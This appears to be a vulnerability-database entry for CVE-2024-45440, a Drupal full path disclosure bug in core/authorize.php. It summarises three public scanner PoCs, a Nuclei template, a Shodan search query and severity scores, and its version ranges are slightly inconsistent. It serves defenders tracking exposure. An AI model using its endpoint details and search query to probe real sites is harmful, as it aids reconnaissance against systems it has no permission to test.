CVE-2024-45440

MEDIUM NUCLEI LAB

Drupal 10.3.0-10.3.5 - Full Path Disclosure via Missing hash_salt File

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 3 public exploits for CVE-2024-45440. PoCs published by Milad karimi, w0r1i0g1ht, zoomdbz. A Nuclei detection template is also available.

AI-analyzed exploit summary This script scans for CVE-2024-45440, a full path disclosure vulnerability in Drupal 11.x-dev. It checks for the presence of 'settings.php' in the response from '/core/authorize.php' and extracts the full path if vulnerable.

Description

core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.

Exploits (3)

exploitdb SCANNER
by Milad karimi · pythonwebappsphp
https://www.exploit-db.com/exploits/52266

This script scans for CVE-2024-45440, a full path disclosure vulnerability in Drupal 11.x-dev. It checks for the presence of 'settings.php' in the response from '/core/authorize.php' and extracts the full path if vulnerable.

Classification
Scanner 90%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Drupal 11.x-dev
No auth needed
Prerequisites: Target must be running Drupal 11.x-dev with the vulnerable '/core/authorize.php' endpoint accessible
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec SCANNER 2 stars
by w0r1i0g1ht · poc
https://github.com/w0r1i0g1ht/CVE-2024-45440

The repository contains a Python script that scans for CVE-2024-45440, a Drupal 11.x-dev Full Path Disclosure vulnerability in core/authorize.php. The script checks for the presence of 'settings.php' in the response and extracts the full path if vulnerable.

Classification
Scanner 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Drupal 11.x-dev
No auth needed
Prerequisites: Access to the target Drupal instance's core/authorize.php endpoint
devstral-2 · analyzed Feb 19, 2026 Full analysis →
nomisec SCANNER
by zoomdbz · poc
https://github.com/zoomdbz/CVE-2024-45440

This repository contains a Python-based scanner for CVE-2024-45440, which targets a full path disclosure vulnerability in Drupal 11.x-dev. The tool checks for the presence of sensitive paths in the response from the `/core/authorize.php` endpoint.

Classification
Scanner 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Drupal 11.x-dev
No auth needed
Prerequisites: Access to the target Drupal instance's `/core/authorize.php` endpoint
devstral-2 · analyzed Feb 19, 2026 Full analysis →

Nuclei Templates (1)

Drupal 11.x-dev - Full Path Disclosure
MEDIUMVERIFIEDby DhiyaneshDK
Shodan: http.component:"drupal" || cpe:"cpe:2.3:a:drupal:drupal"

References (3)

Core 3

Scores

CVSS v3 5.3
EPSS 0.8669
EPSS Percentile 99.4%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact partial

Lab Environment

COMMUNITY
Community Lab
docker pull drupal:10.1.8

Details

CWE
CWE-209
Status published
Products (4)
drupal/core 10.3.0 - 10.3.6Packagist
drupal/core-recommended 10.3.0 - 10.3.6Packagist
drupal/drupal 2023-05-09
drupal/drupal 10.3.0 - 10.3.6Packagist
Published Aug 29, 2024
Tracked Since Feb 18, 2026